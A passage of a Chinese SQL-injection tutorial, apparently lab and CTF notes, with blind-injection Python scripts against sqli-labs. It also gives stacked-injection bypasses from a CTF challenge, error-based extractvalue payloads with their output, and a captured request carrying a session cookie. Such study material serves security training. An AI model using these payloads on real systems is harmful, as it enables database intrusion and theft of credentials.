&nbsp;# \u8f93\u51fa\u6bcf\u6761\u6570\u636e<br>\u200b<br>\u200b<br>if __name__ == '__main__':<br> &nbsp; &nbsp;url = \"http:\/\/192.168.184.103\/sqli-labs\/Less-5\/?id=1\" &nbsp;# \u76ee\u6807url<br> &nbsp; &nbsp;str = \"You are in\" &nbsp;# \u5e03\u5c14\u578b\u76f2\u6ce8\u7684true&amp;false\u7684\u5224\u65ad\u56e0\u7d20<br> &nbsp; &nbsp;db_length(url, str) &nbsp;# \u7a0b\u5e8f\u5165\u53e3<br>\u200b<\/pre>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>\u5f15\u7528:<a href=\"https:\/\/blog.csdn.net\/mochu7777777\/article\/details\/104825456?ops_request_misc={%22request_id%22%3A%22162384812616780265499873%22%2C%22scm%22%3A%2220140713.130102334..%22}&amp;request_id=162384812616780265499873&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-104825456.first_rank_v2_pc_rank_v29&amp;utm_term=\u5e03\u5c14\u76f2\u6ce8+\u811a\u672c&amp;spm=1018.2226.3001.4187\">\u5e03\u5c14\u578b\u76f2\u6ce8Python\u811a\u672c<em>\u672b\u521d \u00b7 mochu7-CSDN\u535a\u5ba2<\/em>bool\u76f2\u6ce8\u811a\u672c<\/a><\/p>\n<\/blockquote>\n\n\n\n<h3 class=\"wp-block-heading\">\u624b\u5de5 POST\u65b9\u5f0f<\/h3>\n\n\n\n<p>\u7528burpsuite\u65b9\u5f0f\u8f85\u52a9\u624b\u5de5\u6ce8\u5165<\/p>\n\n\n\n<p>\u53ea\u6709\u4e00\u4e2a\u7206\u7834\u70b9\u9009\u62e9Snipper\uff0c\u4e24\u4e2a\u7206\u7834\u70b9\u9009\u62e9Cluster bomb<\/p>\n\n\n\n<p><strong>\u5224\u65ad\u6570\u636e\u5e93\u957f\u5ea6<\/strong><\/p>\n\n\n\n<p>admin&#8217; and length(database())=<code>8<\/code># \u5b57\u7b26\u578b \u5176\u4e2d\u5c068\u6570\u5b57\u8bbe\u7f6e\u7206\u7834\u70b9<\/p>\n\n\n\n<p>1 and length(database())=<code>8<\/code># \u6570\u5b57\u578b<\/p>\n\n\n\n<p><strong>\u7206\u6570\u636e\u5e93<\/strong><\/p>\n\n\n\n<p>admin&#8217; and ascii(substr(database(),<code>1<\/code>,1))=<code>100<\/code># \u5b57\u7b26\u578b \u5176\u4e2d\u5c061\u548c100\u8bbe\u7f6e\u7206\u7834\u70b9 1\u4e3a\u7206\u6570\u636e\u5e93\u540d\u7684\u7b2c\u4e00\u4f4d\uff0c\u6570\u5b57\u5faa\u73af\u8bbe\u7f6e\u4e3a\u6570\u636e\u5e93\u540d\u7684\u957f\u5ea6\uff1b100\u4e3aASCII\u7801\uff0c\u8bbe\u7f6e65-122(\u5927\u5199\u5b57\u6bcdA\u5230\u5c0f\u5199\u5b57\u6bcdz)<\/p>\n\n\n\n<p><strong>\u7206\u8868<\/strong><\/p>\n\n\n\n<p>\u7206\u8868\u6570\u91cf<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and (select count(*) from information_schema.tables where table_schema=database())=<code>4<\/code>#<\/p>\n\n\n\n<p>4\u8bbe\u7f6e\u4e3a\u7206\u7834\u70b9<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u8868\u540d<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1), <code>1<\/code>,1))=<code>100<\/code>#<\/p>\n\n\n\n<p>\u5176\u4e2d\u5c061\u548c100\u8bbe\u7f6e\u7206\u7834\u70b9 1\u4e3a\u7206\u6570\u636e\u5e93\u540d\u7684\u7b2c\u4e00\u4f4d\uff0c\u6570\u5b57\u5faa\u73af\u8bbe\u7f6e\u4e3a\u6570\u636e\u5e93\u540d\u7684\u957f\u5ea6\uff1b100\u4e3aASCII\u7801\uff0c\u8bbe\u7f6e65-122(\u5927\u5199\u5b57\u6bcdA\u5230\u5c0f\u5199\u5b57\u6bcdz)<\/p>\n\n\n\n<p>\u5176\u4e2d\u7206\u7b2c\u4e00\u4e2a\u8868\u4e3alimit 0,1 \u5982\u679c\u8981\u7206\u7b2c\u4e8c\u4e2a\u8868\u4e3alimit 1,1<\/p>\n<\/blockquote>\n\n\n\n<p><strong>\u7206\u5b57\u6bb5<\/strong><\/p>\n\n\n\n<p>\u7206\u5b57\u6bb5\u6570<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and (select count(*) from information_schema.columns where table_schema=&#8221;security&#8221; and table_name=&#8221;users&#8221;)=<code>3<\/code>#<\/p>\n\n\n\n<p>3\u8bbe\u7f6e\u4e3a\u7206\u7834\u70b9\uff0c\u7206\u7834\u5b57\u6bb5\u6570\u91cf<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u5b57\u6bb5\u540d\u79f0\u957f\u5ea6<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and length((select column_name from information_schema.columns where table_name=&#8221;users&#8221; and table_schema=&#8221;security&#8221; limit 0,1))=<code>2<\/code>#<\/p>\n\n\n\n<p>2\u8bbe\u7f6e\u4e3a\u7206\u7834\u70b9\uff0c\u7206\u5b57\u6bb5\u957f\u5ea6<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u5b57\u6bb5\u540d\u79f0<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and ascii(substr((select column_name from information_schema.columns where table_name=&#8221;users&#8221; and table_schema=&#8221;security&#8221; limit 0,1),<code>1<\/code>,1))=<code>1<\/code>#<\/p>\n\n\n\n<p>\u5176\u4e2d\u7b2c\u4e00\u4e2a\u7206\u7834\u70b9\u4e3a\u5b57\u6bb5\u7b2c\u51e0\u4f4d\uff0c\u7b2c\u4e8c\u4e2a\u7206\u7834\u70b9\u4e3aASCII\u7801<\/p>\n\n\n\n<p>\u7206\u7b2c\u4e00\u4e2a\u5b57\u6bb5\u4e3alimit 0,1 \u540c\u7406\u7b2c\u4e8c\u4e2a\u4e3alimit 1,1<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u6570\u91cf<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and (select count(*) from users)=<code>13<\/code>#<\/p>\n\n\n\n<p>13\u4e3a\u7206\u7834\u70b9<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u5b57\u6bb5\u503c\u957f\u5ea6<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and length((select username from users limit 0,1))=<code>10<\/code>#<\/p>\n\n\n\n<p>10\u4e3a\u7206\u7834\u70b9<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u5b57\u6bb5\u503c<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>admin&#8217; and ascii(substr((select username from users limit 0,1),<code>1<\/code>,1))=<code>68<\/code>#<\/p>\n\n\n\n<p>\u5176\u4e2d\u7b2c\u4e00\u4e2a\u7206\u7834\u70b9\u4e3a\u5b57\u6bb5\u503c\u7b2c\u51e0\u4f4d\uff0c\u7b2c\u4e8c\u4e2a\u7206\u7834\u70b9\u4e3aASCII\u7801<\/p>\n<\/blockquote>\n\n\n\n<p>\u7206\u51fa\u7684flag\u592a\u957f\uff0c\u53ef\u4ee5\u590d\u5236\u5230excel\u91cc\uff0c\u7136\u540e\u6392\u5e8fflag\u7684\u987a\u5e8f\uff0c\u7136\u540e\u4f7f\u7528\u811a\u672c\u6279\u91cf\u8f6c\u6362\u5b57\u7b26<\/p>\n\n\n\n<p>\u811a\u672c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">def ascii_to_char(ascii_str):<br> &nbsp; &nbsp;return ''.join(chr(int(ascii)) for ascii in ascii_str.split())<br>\u200b<br>ascii_code = \"102 108 97 103 58 100 56 49 98 54 54 51 56 48 52 102 102 56 50 100 51 50 98 100 54 55 99 48 52 54 98 97 49 97 48 52 102 58\"<br>char_str = ascii_to_char(ascii_code)<br>print(char_str) &nbsp;<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u65f6\u95f4\u76f2\u6ce8<\/h2>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p><strong>\u9996\u5148\u6211\u89c9\u5f97\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\u548c\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\u7684\u6700\u76f4\u89c2\u7684\u5dee\u522b\u5c31\u662f\u201c\u53c2\u7167\u7269\u201d\u4e0d\u540c\uff0c\u4e5f\u5c31\u662f\u8bf4\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5176\u5b9e\u662f\u53ef\u4ee5\u901a\u8fc7\u9875\u9762\u7684\u4e00\u4e9b\u53d8\u5316\u6765\u8fdb\u884c\u5224\u65ad\u7ed3\u679c\uff01\u4f46\u662f\u6709\u7684\u65f6\u5019\uff0c\u6267\u884c\u4e00\u4e9bsql\u8bed\u53e5\u7684\u6d4b\u8bd5\uff0c\u9875\u9762\u4e0d\u4f1a\u6709\u50cf\u5e03\u5c14\u76f2\u6ce8\u7684\u65f6\u5019\u6bd4\u8f83\u76f4\u89c2\u7684\u53d8\u5316\uff0c\u6240\u4ee5\u8fd9\u4e2a\u65f6\u5019\u6240\u8c13\u7684\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u4e5f\u5c31\u662f\u5728\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\u4e0a\u7ed3\u5408if\u5224\u65ad\u548csleep\uff08\uff09\u51fd\u6570\u6765\u5f97\u5230\u4e00\u4e2a\u65f6\u95f4\u4e0a\u7684\u53d8\u6362\u5ef6\u8fdf\u7684\u53c2\u7167\uff0c\u4e5f\u5c31\u53ef\u4ee5\u8ba9\u6211\u4eec\u8fdb\u884c\u4e00\u4e9b\u5224\u65ad\u3002<\/strong><\/p>\n<\/blockquote>\n\n\n\n<ul>\n<li>\u9996\u5148\u5224\u65ad\u662f\u5426\u4e3a\u65f6\u95f4\u76f2\u6ce8\u65f6\u95f4\u76f2\u6ce8\u65e0\u8bbaid\u540e\u8f93\u4ec0\u4e48\u9875\u9762\u90fd\u6ca1\u6709\u53d8\u5316\uff0c\u901a\u8fc7sleep\u51fd\u6570\u5f97\u5230\u65f6\u95f4\u4e0a\u7684\u53d8\u5316\u6765\u5224\u65ad\u6b63\u786e\u4e0e\u5426<\/li>\n\n\n\n<li>\u7136\u540e\u5224\u65ad\u6570\u5b57\u540e\u662f\u5355\u5f15\u53f7\u8fd8\u662f\u53cc\u5f15\u53f7\u95ed\u5408\u65b9\u5f0f?id=1&#8243; and if(ascii(substr(database(),1,1))&gt;115,1,sleep(3))&#8211;+\u4fee\u65391\u540e\u9762\u7684\u5355\u5f15\u53f7\u6216\u53cc\u5f15\u53f7<\/li>\n\n\n\n<li>\u5f97\u5230\u95ed\u5408\u65b9\u5f0f\u540e\uff0c\u4fee\u6539payload\uff0c\u7528\u811a\u672c\u8dd1<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">GET\u65b9\u5f0f<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">import requests<br>import time<br>import string<br>import sys<br>\u200b<br>headers = {\"user-agent\": \"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)\"}<br>\u200b<br>chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'<br>\u200b<br>database = ''<br>\u200b<br>length = 1<br>\u200b<br>url = 'http:\/\/192.168.184.103\/sqli-labs\/Less-6\/?id=1\\\"'<br>\u200b<br>for l in range(1, 20):<br> &nbsp; &nbsp;payload = ' and if(length(database())&gt;{0},1,sleep(3))--+'.format(l)<br>\u200b<br> &nbsp; &nbsp;start_time0 = time.time()<br> &nbsp; &nbsp;rsp0 = requests.get(url+payload, headers=headers)<br> &nbsp; &nbsp;if time.time() - start_time0 &gt; 2.5:<br> &nbsp; &nbsp; &nbsp; &nbsp;print('\u6570\u636e\u5e93\u957f\u5ea6\u4e3a\uff1a' + str(l))<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;length = l<br> &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp;pass<br>\u200b<br>for i in range(1,length + 1):<br>\u200b<br> &nbsp; &nbsp;for char in chars:<br> &nbsp; &nbsp; &nbsp; &nbsp;charAscii = ord(char)<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = ' and if(ascii(substr(database(),{0},1))&gt;{1},1,sleep(3))--+'.format(i, charAscii)<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;start_time = time.time()<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;rsp = requests.get(url+payload, headers=headers)<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp;if time.time() - start_time &gt; 2.5:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;database += char<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br> &nbsp; &nbsp; &nbsp; &nbsp;else:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;pass<br>print('\u6570\u636e\u5e93\u540d\u5b57\u4e3a\uff1a' + database)<br>\u200b<br>table = ''<br>for i in range(1, 30):<br> &nbsp; &nbsp;for j in range(32, 127):<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = ' and if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep(3),1)--+'.format(i, j)<br> &nbsp; &nbsp; &nbsp; &nbsp;start_time = time.time()<br> &nbsp; &nbsp; &nbsp; &nbsp;rsp1 = requests.get(url+payload, headers=headers)<br> &nbsp; &nbsp; &nbsp; &nbsp;if time.time() - start_time &gt; 2.5:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;table += chr(j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br>print('\u6570\u636e\u5e93\u4e2d\u7684\u8868\u6709\uff1a' + table)<br>#<br>field = ''<br>for i in range(1, 50):<br> &nbsp; &nbsp;for j in range(32, 127):<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = \" and if(ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1))={},sleep(3),1)--+\".format(i, j)<br> &nbsp; &nbsp; &nbsp; &nbsp;start_time=time.time()<br> &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(url+payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;if time.time() - start_time &gt; 2.5:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;field += chr(j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br>print('\u8868\u4e2d\u7684\u5b57\u6bb5\u6709\uff1a' + field)<br>\u200b<br>flag = ''<br>for i in range(1, 50):<br> &nbsp; &nbsp;for j in range(32, 127):<br> &nbsp; &nbsp; &nbsp; &nbsp;payload = ' and if(ascii(substr((select group_concat(username,\\'~\\',password) from users),{0},1))={1},sleep(3),1)%23--+'.format(i, j)<br> &nbsp; &nbsp; &nbsp; &nbsp;start_time=time.time()<br> &nbsp; &nbsp; &nbsp; &nbsp;r = requests.get(url+payload)<br> &nbsp; &nbsp; &nbsp; &nbsp;if time.time() - start_time &gt; 2.5:<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;flag += chr(j)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break<br>print('\u8868\u4e2d\u5b57\u6bb5\u503c\u4e3a\uff1a' + flag)<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">POST\u65b9\u5f0f<\/h3>\n\n\n\n<p>\u7528sqlmap<\/p>\n\n\n\n<p><a href=\"https:\/\/blog.csdn.net\/qq_53079406\/article\/details\/125647160\">\uff08sqlmap\uff09\u3010sqli-labs8-10\u3011\u76f2\u6ce8\uff1a\u5e03\u5c14\u76f2\u6ce8\u3001\u65f6\u95f4\u76f2\u6ce8_sqlmap\u76f2\u6ce8\u547d\u4ee4-CSDN\u535a\u5ba2<\/a><\/p>\n\n\n\n<p>\u8e29\u5751\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">POST \/check HTTP\/1.1<br>Host: scene-vykunnmfkj799tbz-web-3000.zhigeng.toolmao.com<br>Sec-Ch-Ua-Platform: \"Windows\"<br>Referer: https:\/\/scene-vykunnmfkj799tbz-web-3000.zhigeng.toolmao.com\/<br>Cookie: connect.sid=s%3A4SmkQ_acvmz1aCG9ccDmgU5S2L7-gx6G.WQun58WK3z7z4tQutr8Byl8kco7vOilKJsFEU7UowxE<br>Sec-Ch-Ua: \"Not=A?Brand\";v=\"99\", \"Chromium\";v=\"118\"<br>Accept: *\/*<br>X-Requested-With: XMLHttpRequest<br>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/98.0.4758.102 Safari\/537.36<br>Origin: https:\/\/scene-vykunnmfkj799tbz-web-3000.zhigeng.toolmao.com<br>Sec-Fetch-Dest: empty<br>Content-Type: application\/x-www-form-urlencoded; charset=UTF-8<br>Sec-Fetch-Site: same-origin<br>Accept-Language: en-US,en;q=0.9<br>Connection: keep-alive<br>Content-Length: 5<br>Sec-Ch-Ua-Mobile: ?0<br>Sec-Fetch-Mode: cors<br>\u200b<br>id=15<\/pre>\n\n\n\n<p>\u6ce8\u610f\u8fd9\u6bb5<code>HTTP\/1.1<\/code> \u4f46\u539f\u7f51\u5740\u662f<code>https:\/\/scene-vykunnmfkj799tbz-web-3000.zhigeng.toolmao.com\/<\/code><\/p>\n\n\n\n<p>\u6240\u4ee5\u5728sqlmap\u4e2d\u8981\u5f3a\u5236\u4f7f\u7528HTTPS <code>--force-ssl<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5806\u53e0\u6ce8\u5165<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u6f0f\u6d1e\u6210\u56e0<\/h3>\n\n\n\n<ul>\n<li>\u4f7f\u7528<code>mysqli_multi_query()<\/code>\u8fd9\u79cd\u652f\u6301\u591a\u8bed\u53e5\u6267\u884c\u7684\u51fd\u6570<\/li>\n\n\n\n<li>\u4f7f\u7528PDO\u7684\u65b9\u5f0f\u8fdb\u884c\u6570\u636e\u67e5\u8be2\uff0c\u521b\u5efaPDO\u5b9e\u4f8b\u65f6<code>PDO::MYSQL_ATTR_MULTI_STATEMENTS<\/code>\u8bbe\u7f6e\u4e3a<code>true<\/code>\u65f6\uff0c\u53ef\u4ee5\u6267\u884c\u591a\u8bed\u53e5<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">bypass\u6280\u5de7<\/h3>\n\n\n\n<p>\u4ee5[GYCTF2020]Blacklist\u4e3a\u4f8b <code>preg_match(\"\/set|prepare|alter|rename|select|update|delete|drop|insert|where|\\.\/i\",$inject)<\/code><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u83b7\u53d6\u6570\u636e\u5e93\u540d\u3001\u8868\u540d\u3001\u5217\u540d<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>show databases;<br>show tables;<br>show columns from `table_name`;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">\u4fee\u6539\u8868\u540d<\/h4>\n\n\n\n<p>\u6b64\u65f6\u62fc\u63a5sql\u8bed\u53e5\u7684\u4ee3\u7801\u80af\u5b9a\u662f\u56fa\u5b9a\u4ece\u4e00\u4e2a\u8868\u91cc\u53d6\u51fa\u67d0\u5217\u7684\u6570\u636e\uff0c\u8fd9\u65f6\u5019\u6211\u4eec\u4fee\u6539\u8868\u540d\uff0c\u53d6\u51fa\u6570\u636e\u6765<\/p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>1\u3001\u5c06words\u8868\u540d\u66ff\u6362\u6210\u5176\u4ed6\u7684<\/p>\n\n\n\n<p>2\u3001\u7136\u540e\u5c06 <code>1919810931114514<\/code> \u8fd9\u4e2a\u8868\u540d\u79f0\u66ff\u6362\u6210words<\/p>\n\n\n\n<p>3\u3001\u5728\u628aflag\u8fd9\u4e2a\u5b57\u6bb5\u66ff\u6362\u6210data<\/p>\n\n\n\n<p>4\u3001\u6700\u540e\u518d\u63d2\u5165\u4e00\u4e2aid\u5b57\u6bb5<\/p>\n\n\n\n<p>\u6700\u7ec8\u7684\u67e5\u8be2\u7ed3\u679c\u5c31\u53ef\u4ee5\u8f93\u51fa\u6211\u4eec\u6784\u9020\u7684\u65b0\u7684words\u4e86<\/p>\n<\/blockquote>\n\n\n\n<pre class=\"wp-block-code\"><code>1';<br>alter table words rename to words1;<br>alter table `1919810931114514` rename to words;<br>alter table words change flag id varchar(50);#<\/code><\/pre>\n\n\n\n<p>\u6700\u540e\u7528&nbsp; 1&#8242; or 1=1# \u3000\u3000\u628aflag\u6253\u5370\u51fa\u6765<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u9884\u7f16\u8bd1<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>1';<br>SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;<br>prepare execsql from @a;<br>execute execsql;#<\/code><\/pre>\n\n\n\n<p>\u752816\u7981\u6b62\u7ed5\u8fc7<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Handler<\/h4>\n\n\n\n<p>\u5728\u8fd9\u6b21\u6bd4\u8d5b\u4e2d<code>set<\/code>\uff0c<code>rename<\/code>\u90fd\u88ab\u8fc7\u6ee4\uff0c\u7528handler\u7ed5\u8fc7<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1';<br>HANDLER FlagHere OPEN;<br>HANDLER FlagHere READ FIRST;<br>HANDLER FlagHere CLOSE;#<\/code><\/pre>\n\n\n\n<p><code>HANDLER ... OPEN<\/code>\u8bed\u53e5\u6253\u5f00\u4e00\u4e2a\u8868\uff0c\u4f7f\u5176\u53ef\u4ee5\u4f7f\u7528\u540e\u7eed<code>HANDLER ... READ<\/code>\u8bed\u53e5\u8bbf\u95ee\uff0c\u8be5\u8868\u5bf9\u8c61\u672a\u88ab\u5176\u4ed6\u4f1a\u8bdd\u5171\u4eab\uff0c\u5e76\u4e14\u5728\u4f1a\u8bdd\u8c03\u7528<code>HANDLER ... CLOSE<\/code>\u6216\u4f1a\u8bdd\u7ec8\u6b62\u4e4b\u524d\u4e0d\u4f1a\u5173\u95ed<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u62a5\u9519\u6ce8\u5165<\/h2>\n\n\n\n<p><strong>extractvalue\u548cupdatexml<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">extractvalue<\/h3>\n\n\n\n<p>extractvalue \u53ea\u8981\u4ee5#\u6216\u8005~\u5f00\u5934\u7684\u5185\u5bb9\uff0c\u4e0d\u662fxml\u683c\u5f0f\u7684\u8bed\u6cd5\uff0c\u4f1a\u62a5\u9519\uff0c\u4f46\u662f\u4f1a\u663e\u793a\u65e0\u6cd5\u8bc6\u522b\u7684\u5185\u5bb9\u662f\u4ec0\u4e48<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">mysql&gt; select extractvalue(1,concat(0x7e,(select database()),0x7e))<br>ERROR 1105 (HY000): XPATH syntax error: ~security~<\/pre>\n\n\n\n<p>\u5176\u4e2d0x7e\u662f~\u7684\u7f16\u7801\uff0c\u524d\u540e\u90fd\u6709\u662f\u56e0\u4e3a\u5224\u65ad\u62a5\u9519\u663e\u793a\u7684\u5185\u5bb9\u662f\u5426\u5b8c\u6574<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u793a\u4f8b<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\">\u67e5\u8be2\u6570\u636e\u5e93<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select database()),0x7e))<br>XPATH syntax error: &amp;#39;~tarman_db~&amp;#39;<\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">\u67e5\u8be2\u8868\u540d<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\"tarman_db\"),0x7e))<br>XPATH syntax error: &amp;#39;~tw_admin,tw_order~&amp;#39;<\/pre>\n\n\n\n<h5 class=\"wp-block-heading\">\u67e5\u8be2\u5217\u540d<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\"tw_admin\"),0x7e))<br>XPATH syntax error: &amp;#39;~id,email,username,nickname,mobl&amp;#39;<\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u663e\u793a\u6ca1\u6709\u5168\uff0c\u8fd9\u65f6\u5019\u5c31\u7528limit\u51fd\u6570\u4e00\u4e2a\u4e00\u4e2a\u7206<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=\"tw_admin\" limit 0,1),0x7e))<br>XPATH syntax error: &amp;#39;~id~&amp;#39;<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=\"tw_admin\" limit 1,1),0x7e))<br>XPATH syntax error: &amp;#39;~email~&amp;#39;<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=\"tw_admin\" limit 2,1),0x7e))<br>XPATH syntax error: &amp;#39;~username~&amp;#39;<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=\"tw_admin\" limit 5,1),0x7e))<br>XPATH syntax error: &amp;#39;~password~&amp;#39;<\/pre>\n\n\n\n<p>\u7206\u51fa\u6211\u4eec\u8981\u7684\u5b57\u6bb5password<\/p>\n\n\n\n<h5 class=\"wp-block-heading\">\u7206flag<\/h5>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select password from tw_admin),0x7e))<br>XPATH syntax error: &amp;#39;~flag:3b35751a1e4fe9d94b774e5f37&amp;#39;<\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230flag\u4e5f\u6ca1\u6709\u663e\u793a\u5168\uff0c\u5c31\u8981\u7528\u5230mid\u51fd\u6570<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select mid(password,1,25) from tw_admin),0x7e))<br>XPATH syntax error: &amp;#39;~flag:3b35751a1e4fe9d94b77~&amp;#39;<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">id=15 and extractvalue(1,concat(0x7e,(select mid(password,26,50) from tw_admin),0x7e))<br>XPATH syntax error: &amp;#39;~4e5f373fa2a1:~&amp;#39;<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\u5e38\u7528\u51fd\u6570<\/h3>\n\n\n\n<p><strong>concat()<\/strong>\uff1a\u7528\u4e8e\u5c06\u591a\u4e2a\u5b57\u7b26\u4e32\u8fde\u63a5\u6210\u4e00\u4e2a\u5b57\u7b26\u4e32\u3002concat(str1,str2,..)<\/p>\n\n\n\n<p><strong>group_concat()<\/strong>\uff1a\u8fd4\u56de\u4e00\u4e2a\u5b57\u7b26\u4e32\u7ed3\u679c\uff0c\u8be5\u7ed3\u679c\u7531\u5206\u7ec4\u4e2d\u7684\u503c\u8fde\u63a5\u7ec4\u5408\u800c\u6210<\/p>\n\n\n\n<p><strong>limit n,m<\/strong>\uff1a\u7b2c\u4e00\u6b21\u53c2\u6570n\u8868\u793a\u7684\u6e38\u6807\u7684\u504f\u79fb\u91cf\uff0c\u521d\u59cb\u503c\u4e3a0\uff0c\u7b2c\u4e8c\u4e2a\u53c2\u6570m\u8868\u793a\u60f3\u8981\u83b7\u53d6\u591a\u5c11\u6761\u6570\u636e<\/p>\n\n\n\n<p>limit 0,1\uff1a\u4ece\u7b2c\u4e00\u6761\u8bb0\u5f55\u5f00\u59cb\uff0c\u53ea\u53d6\u4e00\u6761<\/p>\n\n\n\n<p><strong>mid(x,n,m)<\/strong>\uff1a\u4ece\u4e00\u4e2a\u5b57\u7b26\u4e32\u4e2d\u622a\u53d6\u51fa\u6307\u5b9a\u6570\u91cf\u7684\u5b57\u7b26<\/p>\n\n\n\n<p>mid(abcd,1,2) \u622a\u53d6ab<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5c0f\u77e5\u8bc6\u70b9 \u7cfb\u7edf\u51fd\u6570 version()\u2014\u2014MySQL \u7248\u672c user()\u2014\u2014\u6570\u636e\u5e93\u7528\u6237\u540d database() 